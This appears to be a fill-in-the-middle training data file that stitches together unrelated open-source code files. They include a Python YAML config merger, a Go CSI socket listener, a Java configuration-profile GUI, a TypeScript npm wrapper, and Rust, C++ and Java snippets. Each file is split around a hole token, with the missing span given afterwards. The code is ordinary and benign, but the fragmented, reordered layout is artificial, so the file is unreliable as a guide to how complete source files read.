if 'import' not in configData:
return configData
for fname in configData['import']:
includeConfig = self._readConfig('configs/{}.yaml'.format(fname))
for key, val in iteritems(includeConfig):
# not present in base config, just assign it
if key not in configData:
configData[key] = val
continue
# skip non-collection types that are already set
if isinstance(configData[key], (str, int)):
continue
if isinstance(val, str):
raise ConfigError(fname, 'The included config file tried '
'to merge a non-string with a '
'string')
try:
iter(configData[key])
iter(val)
except TypeError:
# not a collection, so just don't merge them
pass
else:
try:
# merge with + operator
configData[key] += val
except TypeError:
# dicts can't merge with +
try:
for subKey, subVal in iteritems(val):
if subKey not in configData[key]:
configData[key][subKey] = subVal
except (AttributeError, TypeError):
# if either of these, they weren't both dicts.
raise ConfigError(fname, 'The variable {!r} could '
'not be successfully '
'merged'.format(key))
return configData
def writeConfig(self):
# filter the configData to only those keys
# that were present in the base server config,
# or have been modified at runtime
configData = copy.deepcopy(self._configData)
to_delete = set(configData.keys()).difference(self._inBaseConfig)
for key in to_delete:
del configData[key]
# write the filtered configData
try:
with open(self.configFile, mode='w') as config:
self.yaml.dump(configData, config)
except Exception as e:
raise ConfigError(self.configFile, e)
def getWithDefault(self, key, default=None):
if key in self._configData:
return self._configData[key]
return default
def _validate(self, configData):
for key in _required:
if key not in configData:
raise ConfigError(self.configFile, 'Required item {!r} was not found in the config.'.format(key))
def __len__(self):
return len(self._configData)
def __iter__(self):
return iter(self._configData)
def __getitem__(self, key):
return self._configData[key]
def __setitem__(self, key, value):
# mark this key to be saved in the server config
if key not in self._inBaseConfig:
self._inBaseConfig.append(key)
self._configData[key] = value
def __contains__(self, key):
return key in self._configData
class ConfigError(Exception):
def __init__(self, configFile, message):
self.configFile = configFile
self.message = message
def __str__(self):
return 'An error occurred while reading config file {}: {}'.format(self.configFile,
self.message)<|fim▁end|>
|
import copy
|
<|file_name|>Autocomplete.java<|end_file_name|><|fim▁begin|>package site;
public class Autocomplete {
<|fim▁hole|>
public Autocomplete(String label, String value) {
this.label = label;
this.value = value;
}
public final String getLabel() {
return this.label;
}
public final String getValue() {
return this.value;
}
}<|fim▁end|>
|
private final String label;
private final String value;
|
<|file_name|>gels.hpp<|end_file_name|><|fim▁begin|>#ifndef NT2_LINALG_INCLUDE_FUNCTIONS_SCALAR_GELS_HPP_INCLUDED
#define NT2_LINALG_INCLUDE_FUNCTIONS_SCALAR_GELS_HPP_INCLUDED<|fim▁hole|>#include <nt2/linalg/functions/gels.hpp>
#endif<|fim▁end|>
| |
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>use std::env;
use std::process;
use minigrep::Config;
fn main() {
let args: Vec<String> = env::args().collect();
let config = Config::new(&args).unwrap_or_else(|err| {
eprintln!("Problem parsing arguments: {}", err);
process::exit(1);
});
if let Err(e) = minigrep::run(config) {
eprintln!("Application error: {}", e);
process::exit(1);<|fim▁hole|><|fim▁end|>
|
}
}
|
<|file_name|>exceptions.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""
rdd.exceptions
~~~~~~~~~~~~~~
This module contains the exceptions raised by rdd.
"""
from requests.exceptions import *
class ReadabilityException(RuntimeError):
"""Base class for Readability exceptions."""
<|fim▁hole|>
class ShortenerError(ReadabilityException):
"""Failed to shorten URL."""
class MetadataError(ReadabilityException):
"""Failed to retrieve metadata."""<|fim▁end|>
| |
<|file_name|>Helpers.cpp<|end_file_name|><|fim▁begin|>#include "ofxCv/Helpers.h"
#include "ofxCv/Utilities.h"
namespace ofxCv {
using namespace cv;
ofMatrix4x4 makeMatrix(Mat rotation, Mat translation) {
Mat rot3x3;
if(rotation.rows == 3 && rotation.cols == 3) {
rot3x3 = rotation;
} else {
Rodrigues(rotation, rot3x3);
}
double* rm = rot3x3.ptr<double>(0);
double* tm = translation.ptr<double>(0);
return ofMatrix4x4(rm[0], rm[3], rm[6], 0.0f,
rm[1], rm[4], rm[7], 0.0f,
rm[2], rm[5], rm[8], 0.0f,
tm[0], tm[1], tm[2], 1.0f);
}
void drawMat(Mat& mat, float x, float y) {
drawMat(mat, x, y, mat.cols, mat.rows);
}
// experimental special case of copying into ofTexture, which acts different
// might be able to rewrite this in terms of getDepth() but right now this
// function loses precision with CV_32F -> CV_8U
template <class S>
void copy(S& src, ofTexture& tex) {
Mat mat = toCv(src);
int glType;
Mat buffer;
if(mat.depth() != CV_8U) {
copy(mat, buffer, CV_8U);
} else {
buffer = mat;
}
if(mat.channels() == 1) {
glType = GL_LUMINANCE;
} else {
glType = GL_RGB;
}
int w = buffer.cols;
int h = buffer.rows;
tex.allocate(w, h, glType);
tex.loadData(buffer.ptr(), w, h, glType);
}
void drawMat(Mat& mat, float x, float y, float width, float height) {
if(mat.empty()) {
return;
}
ofTexture tex;
copy(mat, tex);
tex.draw(x, y, width, height);
}
void applyMatrix(const ofMatrix4x4& matrix) {
glMultMatrixf((GLfloat*) matrix.getPtr());
}
int forceOdd(int x) {
return (x / 2) * 2 + 1;
}
int findFirst(const Mat& arr, unsigned char target) {
for(unsigned int i = 0; i < arr.rows; i++) {
if(arr.at<unsigned char>(i) == target) {
return i;
}
}
return 0;
}
int findLast(const Mat& arr, unsigned char target) {
for(unsigned int i = arr.rows - 1; i >= 0; i--) {
if(arr.at<unsigned char>(i) == target) {
return i;
}
}
return 0;
}
float weightedAverageAngle(const vector<Vec4i>& lines) {
float angleSum = 0;
ofVec2f start, end;
float weights = 0;
for(unsigned int i = 0; i < lines.size(); i++) {
start.set(lines[i][0], lines[i][1]);
end.set(lines[i][2], lines[i][3]);
ofVec2f diff = end - start;
float length = diff.length();
float weight = length * length;
float angle = atan2f(diff.y, diff.x);
angleSum += angle * weight;
weights += weight;
}
return angleSum / weights;
}
vector<cv::Point2f> getConvexPolygon(const vector<cv::Point2f>& convexHull, int targetPoints) {
vector<cv::Point2f> result = convexHull;
static const unsigned int maxIterations = 16;
static const double infinity = numeric_limits<double>::infinity();
double minEpsilon = 0;
double maxEpsilon = infinity;
double curEpsilon = 16; // good initial guess
// unbounded binary search to simplify the convex hull until it's targetPoints
if(result.size() > (unsigned int) targetPoints) {
for(unsigned int i = 0; i < maxIterations; i++) {
approxPolyDP(Mat(convexHull), result, curEpsilon, true);
if(result.size() == targetPoints) {
break;
}
if(result.size() > targetPoints) {
minEpsilon = curEpsilon;
if(maxEpsilon == infinity) {
curEpsilon = curEpsilon * 2;
} else {
curEpsilon = (maxEpsilon + minEpsilon) / 2;
}
}
if(result.size() < targetPoints) {
maxEpsilon = curEpsilon;<|fim▁hole|> }
}
return result;
}
void drawHighlightString(string text, ofPoint position, ofColor background, ofColor foreground) {
drawHighlightString(text, position.x, position.y, background, foreground);
}
void drawHighlightString(string text, int x, int y, ofColor background, ofColor foreground) {
vector<string> lines = ofSplitString(text, "\n");
int textLength = 0;
for(unsigned int i = 0; i < lines.size(); i++) {
// tabs are not rendered
int tabs = count(lines[i].begin(), lines[i].end(), '\t');
int curLength = lines[i].length() - tabs;
// after the first line, everything is indented with one space
if(i > 0) {
curLength++;
}
if(curLength > textLength) {
textLength = curLength;
}
}
int padding = 4;
int fontSize = 8;
float leading = 1.7;
int height = lines.size() * fontSize * leading - 1;
int width = textLength * fontSize;
#ifdef TARGET_OPENGLES
// This needs to be refactored to support OpenGLES
// Else it will work correctly
#else
glPushAttrib(GL_DEPTH_BUFFER_BIT);
glDisable(GL_DEPTH_TEST);
ofPushStyle();
ofSetColor(background);
ofFill();
ofRect(x, y, width + 2 * padding, height + 2 * padding);
ofSetColor(foreground);
ofNoFill();
ofPushMatrix();
ofTranslate(padding, padding);
ofDrawBitmapString(text, x + 1, y + fontSize + 2);
ofPopMatrix();
ofPopStyle();
glPopAttrib();
#endif
}
}<|fim▁end|>
|
curEpsilon = (maxEpsilon + minEpsilon) / 2;
}
|
<|file_name|>util.go<|end_file_name|><|fim▁begin|>// Copyright 2018 The OpenSDS Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package util
import (
"errors"
"log"
"net"
"os"
"path"
"reflect"
"regexp"
"strings"
)
// getProtoandAdd return protocal and address
func getProtoAndAdd(target string) (string, string) {
reg := `(?i)^((?:(?:tcp|udp|ip)[46]?)|` + `(?:unix(?:gram|packet)?))://(.+)$`
t := regexp.MustCompile(reg).FindStringSubmatch(target)
return t[1], t[2]
}
func PathExists(path string) (bool, error) {
_, err := os.Stat(path)
if err == nil {
return true, nil
}
if os.IsNotExist(err) {
return false, nil
}
return false, err
}
// getCSIEndPoint from environment variable
func getCSIEndPoint(csiEndpoint string) (string, error) {
// example: CSI_ENDPOINT=unix://path/to/unix/domain/socket.sock
csiEndpoint = strings.TrimSpace(csiEndpoint)
if csiEndpoint == "" {
err := errors.New("csi endpoint is empty")
log.Fatalf("%v", err)
return csiEndpoint, err
}
return csiEndpoint, nil
}
// GetCSIEndPointListener from endpoint
func GetCSIEndPointListener(csiEndpoint string) (net.Listener, error) {
target, err := getCSIEndPoint(csiEndpoint)
if err != nil {
return nil, err
}
proto, addr := getProtoAndAdd(target)
log.Printf("proto: %s addr: %s", proto, addr)<|fim▁hole|> // clean up previous sock file.
os.RemoveAll(addr)
log.Printf("remove sock file: %s", addr)
// Need to make directory at the first time the csi service runs.
dir := path.Dir(addr)
if exist, _ := PathExists(dir); !exist {
os.MkdirAll(dir, 0755)
}
}
return net.Listen(proto, addr)
}
// Contained ...
func Contained(obj, target interface{}) bool {
targetValue := reflect.ValueOf(target)
switch reflect.TypeOf(target).Kind() {
case reflect.Slice, reflect.Array:
for i := 0; i < targetValue.Len(); i++ {
if targetValue.Index(i).Interface() == obj {
return true
}
}
case reflect.Map:
if targetValue.MapIndex(reflect.ValueOf(obj)).IsValid() {
return true
}
default:
return false
}
return false
}<|fim▁end|>
|
if strings.HasPrefix(proto, "unix") {
|
<|file_name|>ConfigLauncherGUI.java<|end_file_name|><|fim▁begin|>package com.tle.configmanager;
import com.dytech.gui.ComponentHelper;
import com.thoughtworks.xstream.XStream;
import com.tle.common.Check;
import java.awt.Container;
import java.awt.Dimension;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileReader;
import java.io.FileWriter;
import java.io.IOException;
import java.io.Reader;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Comparator;
import java.util.List;
import javax.swing.JButton;
import javax.swing.JComboBox;
import javax.swing.JFrame;
import javax.swing.JLabel;
import javax.swing.JOptionPane;
import javax.swing.JSeparator;
import net.miginfocom.swing.MigLayout;
import org.apache.commons.configuration.ConfigurationException;
import org.apache.commons.io.FileUtils;
// Author: Andrew Gibb
@SuppressWarnings({"serial", "nls"})
public class ConfigLauncherGUI extends JFrame implements ActionListener {
public static final String MANDATORY_CONFIG = "mandatory-config.properties";
public static final String OPTIONAL_CONFIG = "optional-config.properties";
public static final String HIBERNATE_CONFIG = "hibernate.properties";
public static final String LOGGING_CONFIG = "learningedge-log4j.properties";
public static final String IMAGEMAGICK_CONFIG =
"plugins/com.tle.core.imagemagick/config.properties.unresolved";
public static final String HIKARI_CONFIG = "hikari.properties";
private final String TITLE = "TLE Configuration Manager";
private final String PATH = "./configs/";
private final String ORACLE = "oracle";
private final String POSTGRESQL = "postgresql";
private final String MSSQL = "ms sql";
private final String source;
private final String destination;
private JLabel lblConfig;
private JComboBox<ConfigProfile> cmbConfigs;
private JButton btnNew, btnEdit, btnApply, btnDelete;
private JSeparator sep;
private List<ConfigProfile> configs;
public ConfigLauncherGUI(String source, String destination) {
setTitle(TITLE);
setupGUI();
setResizable(false);
setDefaultCloseOperation(EXIT_ON_CLOSE);
this.source = source;
this.destination = destination;
// Set a minimum width...leave the height to the pack...
setMinimumSize(new Dimension(300, 0));
pack();
ComponentHelper.centreOnScreen(this);
// Updated combo box containing profiles
updateConfigs();
}
// Sets up the GUI for managing/loading the configuration profiles
private void setupGUI() {
Container contents = getContentPane();
contents.setLayout(new MigLayout("wrap 3", "[grow][grow][grow]"));
configs = new ArrayList<ConfigProfile>();
lblConfig = new JLabel("Configurations: ");
cmbConfigs = new JComboBox<ConfigProfile>();
btnNew = new JButton("New");
btnNew.addActionListener(this);
btnApply = new JButton("Apply Configuration");
btnApply.addActionListener(this);
btnEdit = new JButton("Edit");
btnEdit.addActionListener(this);
sep = new JSeparator();
btnDelete = new JButton("Delete");
btnDelete.addActionListener(this);
contents.add(lblConfig, "growx, spanx 3");
contents.add(cmbConfigs, "growx, spanx 3");
contents.add(btnNew, "growx, center");<|fim▁hole|> }
// Updates the available configuration profiles
public void updateConfigs() {
File srcDir = new File(PATH);
File[] configFiles = srcDir.listFiles();
Reader rdr;
cmbConfigs.removeAllItems();
configs.clear();
if (configFiles != null) {
for (File f : configFiles) {
if (f.isFile()) {
XStream xstream = new XStream();
try {
rdr = new BufferedReader(new FileReader(f));
ConfigProfile prof = (ConfigProfile) xstream.fromXML(rdr);
configs.add(prof);
rdr.close();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
}
Collections.sort(
configs,
new Comparator<ConfigProfile>() {
@Override
public int compare(ConfigProfile o1, ConfigProfile o2) {
return o1.getProfName().compareToIgnoreCase(o2.getProfName());
}
});
for (ConfigProfile prof : configs) {
cmbConfigs.addItem(prof);
}
}
if (configs.isEmpty()) {
btnEdit.setEnabled(false);
btnApply.setEnabled(false);
btnDelete.setEnabled(false);
} else {
btnEdit.setEnabled(true);
btnApply.setEnabled(true);
btnDelete.setEnabled(true);
}
}
@Override
public void actionPerformed(ActionEvent e) {
if (e.getSource() == btnNew) {
addProfile();
} else if (e.getSource() == btnEdit) {
editProfile();
} else if (e.getSource() == btnDelete) {
deleteProfile();
} else if (e.getSource() == btnApply) {
try {
loadProfile();
} catch (Exception ex) {
JOptionPane.showMessageDialog(
null,
"Error loading configuration: \n" + ex.getMessage(),
"Load Failed",
JOptionPane.ERROR_MESSAGE);
}
}
}
// Adds a new profile which is either a clone of an existing profile or is
// blank
private void addProfile() {
ConfigEditorGUI confEd = null;
if (configs != null && cmbConfigs.getSelectedItem() != null) {
ConfigProfile selectedProf = (ConfigProfile) cmbConfigs.getSelectedItem();
int result =
JOptionPane.showConfirmDialog(
null,
"Do you want to clone the currently selected configuration?: "
+ selectedProf.getProfName(),
"Clone Confirmation",
JOptionPane.YES_NO_OPTION);
if (result == JOptionPane.YES_OPTION) {
confEd = new ConfigEditorGUI(selectedProf, "copy");
} else {
confEd = new ConfigEditorGUI();
}
} else {
confEd = new ConfigEditorGUI();
}
confEd.setModal(true);
confEd.setVisible(true);
if (confEd.getResult() == ConfigEditorGUI.RESULT_SAVE) {
updateConfigs();
}
}
// Edits and existing profile
private void editProfile() {
int index = cmbConfigs.getSelectedIndex();
ConfigProfile selectedProf = (ConfigProfile) cmbConfigs.getSelectedItem();
ConfigEditorGUI confEd = new ConfigEditorGUI(selectedProf);
confEd.setModal(true);
confEd.setVisible(true);
if (confEd.getResult() == ConfigEditorGUI.RESULT_SAVE) {
updateConfigs();
cmbConfigs.setSelectedIndex(index);
}
}
// Deletes a configuration profile
private void deleteProfile() {
ConfigProfile selectedProf = (ConfigProfile) cmbConfigs.getSelectedItem();
File toDel = new File(PATH + selectedProf.getProfName() + ".xml");
int result =
JOptionPane.showConfirmDialog(
null,
"Are you sure you want to delete this configuration?: " + selectedProf.getProfName(),
"Delete Confirmation",
JOptionPane.YES_NO_OPTION);
if (result == JOptionPane.YES_OPTION) {
boolean success = toDel.delete();
if (!success) {
JOptionPane.showMessageDialog(
null,
"Unable to delete configuration: " + selectedProf.getProfName(),
"Delete Failed",
JOptionPane.ERROR_MESSAGE);
}
}
updateConfigs();
}
// Loads a profile (SUPER HACKISH)
private void loadProfile() throws FileNotFoundException, IOException, ConfigurationException {
ConfigProfile selectedProf = (ConfigProfile) cmbConfigs.getSelectedItem();
File srcDir = new File(source);
// Remove Current Configuration Files
File destDir = new File(destination);
FileUtils.deleteDirectory(destDir);
// Create Destination
destDir.mkdir();
// Copy Required Files (Database Specific)
boolean oracleSelected = selectedProf.getDbtype().equalsIgnoreCase(ORACLE);
if (oracleSelected) {
org.apache.commons.io.FileUtils.copyFile(
new File(srcDir + "/hibernate.properties.oracle"),
new File(destDir + "/hibernate.properties"));
} else if (selectedProf.getDbtype().equalsIgnoreCase(POSTGRESQL)) {
FileUtils.copyFile(
new File(srcDir + "/hibernate.properties.postgresql"),
new File(destDir + "/hibernate.properties"));
} else if (selectedProf.getDbtype().equalsIgnoreCase(MSSQL)) {
FileUtils.copyFile(
new File(srcDir + "/hibernate.properties.sqlserver"),
new File(destDir + "/hibernate.properties"));
}
// Mandatory / Optional / Logging
FileUtils.copyFile(
new File(srcDir + "/mandatory-config.properties"),
new File(destDir + "/mandatory-config.properties"));
FileUtils.copyFile(
new File(srcDir + "/optional-config.properties"),
new File(destDir + "/optional-config.properties"));
// Copy custom development logging file
FileUtils.copyFile(
new File("./learningedge-log4j.properties"),
new File(destDir + "/learningedge-log4j.properties"));
// Other Miscellaneous Files
FileUtils.copyFile(
new File(srcDir + "/en-stopWords.txt"), new File(destDir + "/en-stopWords.txt"));
FileUtils.copyFile(
new File(srcDir + "/" + HIKARI_CONFIG), new File(destDir + "/" + HIKARI_CONFIG));
// Plugins Folder
FileUtils.copyDirectoryToDirectory(new File(srcDir + "/plugins"), destDir);
// Edit Hibernate Properties
String hibProp = readFile(destination + "/" + HIBERNATE_CONFIG);
hibProp = hibProp.replace("${datasource/host}", selectedProf.getHost());
hibProp = hibProp.replace("${datasource/port}", selectedProf.getPort());
hibProp = hibProp.replace("${datasource/database}", selectedProf.getDatabase());
hibProp = hibProp.replace("${datasource/username}", selectedProf.getUsername());
hibProp = hibProp.replace("${datasource/password}", selectedProf.getPassword());
hibProp =
hibProp.replace(
"${datasource/schema}",
oracleSelected ? "hibernate.default_schema = " + selectedProf.getUsername() : "");
writeFile(destination + "/hibernate.properties", hibProp);
// Edit Mandatory Properties
PropertyEditor mandProps = new PropertyEditor();
mandProps.load(new File(destination + "/" + MANDATORY_CONFIG));
String http = selectedProf.getHttp();
String portFromUrl = selectedProf.getAdminurl().split(":")[1];
mandProps.setProperty(
"http.port",
!Check.isEmpty(http) ? http : !Check.isEmpty(portFromUrl) ? portFromUrl : "80");
String https = selectedProf.getHttps();
if (!Check.isEmpty(https)) {
mandProps.setProperty("https.port", https);
}
String ajp = selectedProf.getAjp();
if (!Check.isEmpty(https)) {
mandProps.setProperty("ajp.port", ajp);
}
mandProps.setProperty("filestore.root", selectedProf.getFilestore());
mandProps.setProperty("java.home", selectedProf.getJavahome());
mandProps.setProperty("admin.url", selectedProf.getAdminurl());
mandProps.setProperty("freetext.index.location", selectedProf.getFreetext());
mandProps.setProperty("freetext.stopwords.file", selectedProf.getStopwords());
String reporting = selectedProf.getReporting();
if (!Check.isEmpty(reporting)) {
mandProps.setProperty("reporting.workspace.location", reporting);
}
mandProps.setProperty("plugins.location", selectedProf.getPlugins());
mandProps.save(new File(destination + "/" + MANDATORY_CONFIG));
// Edit Optional Properties
String optProp = readFile(destination + "/" + OPTIONAL_CONFIG);
if (selectedProf.isDevinst()) {
optProp =
optProp.replace(
"#conversionService.disableConversion = false",
"conversionService.disableConversion = true");
optProp =
optProp.replace(
"conversionService.conversionServicePath = ${install.path#t\\/}/conversion/conversion-service.jar",
"#conversionService.conversionServicePath =");
optProp =
optProp.replace("#pluginPathResolver.wrappedClass", "pluginPathResolver.wrappedClass");
} else {
optProp =
optProp.replace(
"${install.path#t\\/}/conversion/conversion-service.jar",
selectedProf.getConversion());
}
writeFile(destination + "/optional-config.properties", optProp);
// Edit ImageMagik Properties (MORE HAX...)
File imgmgk = new File(destination + "/" + IMAGEMAGICK_CONFIG);
PropertyEditor magickProps = new PropertyEditor();
magickProps.load(imgmgk);
magickProps.setProperty("imageMagick.path", selectedProf.getImagemagick());
magickProps.save(new File((destination + "/" + IMAGEMAGICK_CONFIG).replace(".unresolved", "")));
imgmgk.delete();
JOptionPane.showMessageDialog(
null,
"The configuration: " + selectedProf.getProfName() + " has been successfully loaded.",
"Load Success",
JOptionPane.INFORMATION_MESSAGE);
}
// Reads a file into a string
private String readFile(String path) throws IOException {
StringBuilder contents = new StringBuilder();
BufferedReader br = new BufferedReader(new FileReader(path));
String line = null;
while ((line = br.readLine()) != null) {
contents.append(line);
contents.append(System.getProperty("line.separator"));
}
br.close();
return contents.toString();
}
// Writes a file from String
private void writeFile(String path, String contents) throws IOException {
BufferedWriter output = null;
output = new BufferedWriter(new FileWriter(new File(path)));
output.write(contents);
output.close();
}
}<|fim▁end|>
|
contents.add(btnEdit, "growx, center");
contents.add(btnDelete, "growx, center");
contents.add(sep, "growx, spanx 3");
contents.add(btnApply, "center, growx, spanx 3");
|
<|file_name|>node-package-manager.ts<|end_file_name|><|fim▁begin|>import Future = require("fibers/future");
import * as npm from "npm";
interface INpmOpts {
config?: any;
subCommandName?: string;
path?: string;<|fim▁hole|>export class NodePackageManager implements INodePackageManager {
constructor(private $childProcess: IChildProcess,
private $logger: ILogger,
private $options: IOptions) { }
public getCache(): string {
return npm.cache;
}
public load(config?: any): IFuture<void> {
if (npm.config.loaded) {
let data = npm.config.sources.cli.data;
Object.keys(data).forEach(k => delete data[k]);
if (config) {
_.assign(data, config);
}
return Future.fromResult();
} else {
let future = new Future<void>();
npm.load(config, (err: Error) => {
if (err) {
future.throw(err);
} else {
future.return();
}
});
return future;
}
}
public install(packageName: string, pathToSave: string, config?: any): IFuture<any> {
return (() => {
if (this.$options.disableNpmInstall) {
return;
}
if (this.$options.ignoreScripts) {
config = config || {};
config["ignore-scripts"] = true;
}
try {
return this.loadAndExecute("install", [pathToSave, packageName], { config: config }).wait();
} catch (err) {
if (err.code === "EPEERINVALID") {
// Not installed peer dependencies are treated by npm 2 as errors, but npm 3 treats them as warnings.
// We'll show them as warnings and let the user install them in case they are needed.
// The strucutre of the error object in such case is:
// { [Error: The package @angular/[email protected] does not satisfy its siblings' peerDependencies requirements!]
// code: 'EPEERINVALID',
// packageName: '@angular/core',
// packageVersion: '2.1.0-beta.0',
// peersDepending:
// { '@angular/[email protected]': '2.1.0-beta.0',
// '@angular/[email protected]': '2.1.0-beta.0',
// '@angular/[email protected]': '2.1.0-beta.0',
// '@angular/[email protected]': '2.1.0-beta.0',
// '@angular/[email protected]': '2.1.0-beta.0',
// '@angular/[email protected]': '2.1.0-beta.0',
// '@angular/[email protected]': '2.1.0-beta.0',
// '@angular/[email protected]': '2.1.0-beta.0',
// '@ngrx/[email protected]': '^2.0.0',
// '@ngrx/[email protected]': '^2.0.0',
// '[email protected]': '~2.0.0' } }
this.$logger.warn(err.message);
this.$logger.trace("Required peerDependencies are: ", err.peersDepending);
} else {
// All other errors should be handled by the caller code.
throw err;
}
}
}).future<any>()();
}
public uninstall(packageName: string, config?: any, path?: string): IFuture<any> {
return this.loadAndExecute("uninstall", [[packageName]], { config, path });
}
public search(filter: string[], silent: boolean): IFuture<any> {
let args = (<any[]>([filter] || [])).concat(silent);
return this.loadAndExecute("search", args);
}
public cache(packageName: string, version: string, config?: any): IFuture<IDependencyData> {
// function cache (pkg, ver, where, scrub, cb)
return this.loadAndExecute("cache", [packageName, version, undefined, false], { subCommandName: "add", config: config });
}
public cacheUnpack(packageName: string, version: string, unpackTarget?: string): IFuture<void> {
// function unpack (pkg, ver, unpackTarget, dMode, fMode, uid, gid, cb)
return this.loadAndExecute("cache", [packageName, version, unpackTarget, null, null, null, null], { subCommandName: "unpack" });
}
public view(packageName: string, propertyName: string): IFuture<any> {
return this.loadAndExecute("view", [[packageName, propertyName], [false]]);
}
public executeNpmCommand(npmCommandName: string, currentWorkingDirectory: string): IFuture<any> {
return this.$childProcess.exec(npmCommandName, { cwd: currentWorkingDirectory });
}
private loadAndExecute(commandName: string, args: any[], opts?: INpmOpts): IFuture<any> {
return (() => {
opts = opts || {};
this.load(opts.config).wait();
return this.executeCore(commandName, args, opts).wait();
}).future<any>()();
}
private executeCore(commandName: string, args: any[], opts?: INpmOpts): IFuture<any> {
let future = new Future<any>();
let oldNpmPath: string = undefined;
let callback = (err: Error, data: any) => {
if (oldNpmPath) {
npm.prefix = oldNpmPath;
}
if (err) {
future.throw(err);
} else {
future.return(data);
}
};
args.push(callback);
if (opts && opts.path) {
oldNpmPath = npm.prefix;
npm.prefix = opts.path;
}
let subCommandName: string = opts.subCommandName;
let command = subCommandName ? npm.commands[commandName][subCommandName] : npm.commands[commandName];
command.apply(this, args);
return future;
}
}
$injector.register("npm", NodePackageManager);<|fim▁end|>
|
}
|
<|file_name|>htmlappletelement.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use dom::attr::AttrValue;
use dom::bindings::codegen::Bindings::HTMLAppletElementBinding;
use dom::bindings::codegen::Bindings::HTMLAppletElementBinding::HTMLAppletElementMethods;
use dom::bindings::inheritance::Castable;
use dom::bindings::js::Root;
use dom::document::Document;
use dom::htmlelement::HTMLElement;
use dom::node::Node;
use dom::virtualmethods::VirtualMethods;
use string_cache::Atom;
use util::str::DOMString;
#[dom_struct]
pub struct HTMLAppletElement {<|fim▁hole|>}
impl HTMLAppletElement {
fn new_inherited(localName: DOMString,
prefix: Option<DOMString>,
document: &Document) -> HTMLAppletElement {
HTMLAppletElement {
htmlelement:
HTMLElement::new_inherited(localName, prefix, document)
}
}
#[allow(unrooted_must_root)]
pub fn new(localName: DOMString,
prefix: Option<DOMString>,
document: &Document) -> Root<HTMLAppletElement> {
let element = HTMLAppletElement::new_inherited(localName, prefix, document);
Node::reflect_node(box element, document, HTMLAppletElementBinding::Wrap)
}
}
impl HTMLAppletElementMethods for HTMLAppletElement {
// https://html.spec.whatwg.org/multipage/#the-applet-element:dom-applet-name
make_getter!(Name);
// https://html.spec.whatwg.org/multipage/#the-applet-element:dom-applet-name
make_atomic_setter!(SetName, "name");
}
impl VirtualMethods for HTMLAppletElement {
fn super_type(&self) -> Option<&VirtualMethods> {
Some(self.upcast::<HTMLElement>() as &VirtualMethods)
}
fn parse_plain_attribute(&self, name: &Atom, value: DOMString) -> AttrValue {
match name {
&atom!("name") => AttrValue::from_atomic(value),
_ => self.super_type().unwrap().parse_plain_attribute(name, value),
}
}
}<|fim▁end|>
|
htmlelement: HTMLElement
|
<|file_name|>AsyncTask.java<|end_file_name|><|fim▁begin|>/*******************************************************************************
* This file is part of OpenNMS(R).
*
* Copyright (C) 2007-2014 The OpenNMS Group, Inc.
* OpenNMS(R) is Copyright (C) 1999-2014 The OpenNMS Group, Inc.
*
* OpenNMS(R) is a registered trademark of The OpenNMS Group, Inc.
*
* OpenNMS(R) is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as published
* by the Free Software Foundation, either version 3 of the License,
* or (at your option) any later version.
*
* OpenNMS(R) is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with OpenNMS(R). If not, see:
* http://www.gnu.org/licenses/
*
* For more information contact:
* OpenNMS(R) Licensing <[email protected]>
* http://www.opennms.org/
* http://www.opennms.com/
*******************************************************************************/
package org.opennms.core.tasks;
import org.springframework.util.Assert;
/**
* <p>AsyncTask class.</p>
*
* @author ranger
* @version $Id: $
*/
public class AsyncTask<T> extends AbstractTask {
private final Async<T> m_async;
private final Callback<T> m_callback;
/**
* <p>Constructor for AsyncTask.</p>
*
* @param coordinator a {@link org.opennms.core.tasks.TaskCoordinator} object.
* @param parent a {@link org.opennms.core.tasks.ContainerTask} object.
* @param async a {@link org.opennms.core.tasks.Async} object.
* @param <T> a T object.
*/
public AsyncTask(TaskCoordinator coordinator, ContainerTask<?> parent, Async<T> async) {
this(coordinator, parent, async, null);<|fim▁hole|>
/**
* <p>Constructor for AsyncTask.</p>
*
* @param coordinator a {@link org.opennms.core.tasks.TaskCoordinator} object.
* @param parent a {@link org.opennms.core.tasks.ContainerTask} object.
* @param async a {@link org.opennms.core.tasks.Async} object.
* @param callback a {@link org.opennms.core.tasks.Callback} object.
*/
public AsyncTask(TaskCoordinator coordinator, ContainerTask<?> parent, Async<T> async, Callback<T> callback) {
super(coordinator, parent);
Assert.notNull(async, "async parameter must not be null");
m_async = async;
m_callback = callback;
}
/** {@inheritDoc} */
@Override
public String toString() {
return String.valueOf(m_async);
}
/** {@inheritDoc} */
@Override
protected void doSubmit() {
Callback<T> callback = callback();
try {
m_async.supplyAsyncThenAccept(callback);
} catch (Throwable t) {
callback.handleException(t);
}
}
/**
* <p>markTaskAsCompleted</p>
*/
private final void markTaskAsCompleted() {
getCoordinator().markTaskAsCompleted(this);
}
private Callback<T> callback() {
return new Callback<T>() {
@Override
public void accept(T t) {
try {
if (m_callback != null) {
m_callback.accept(t);
}
} finally {
markTaskAsCompleted();
}
}
@Override
public T apply(Throwable t) {
try {
if (m_callback != null) {
m_callback.handleException(t);
}
} finally {
markTaskAsCompleted();
}
return null;
}
};
}
}<|fim▁end|>
|
}
|
<|file_name|>ActionFactory.java<|end_file_name|><|fim▁begin|>package beseenium.controller.ActionFactory;
/** Copyright(C) 2015 Jan P.C. Hanson & BeSeen Marketing Ltd
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
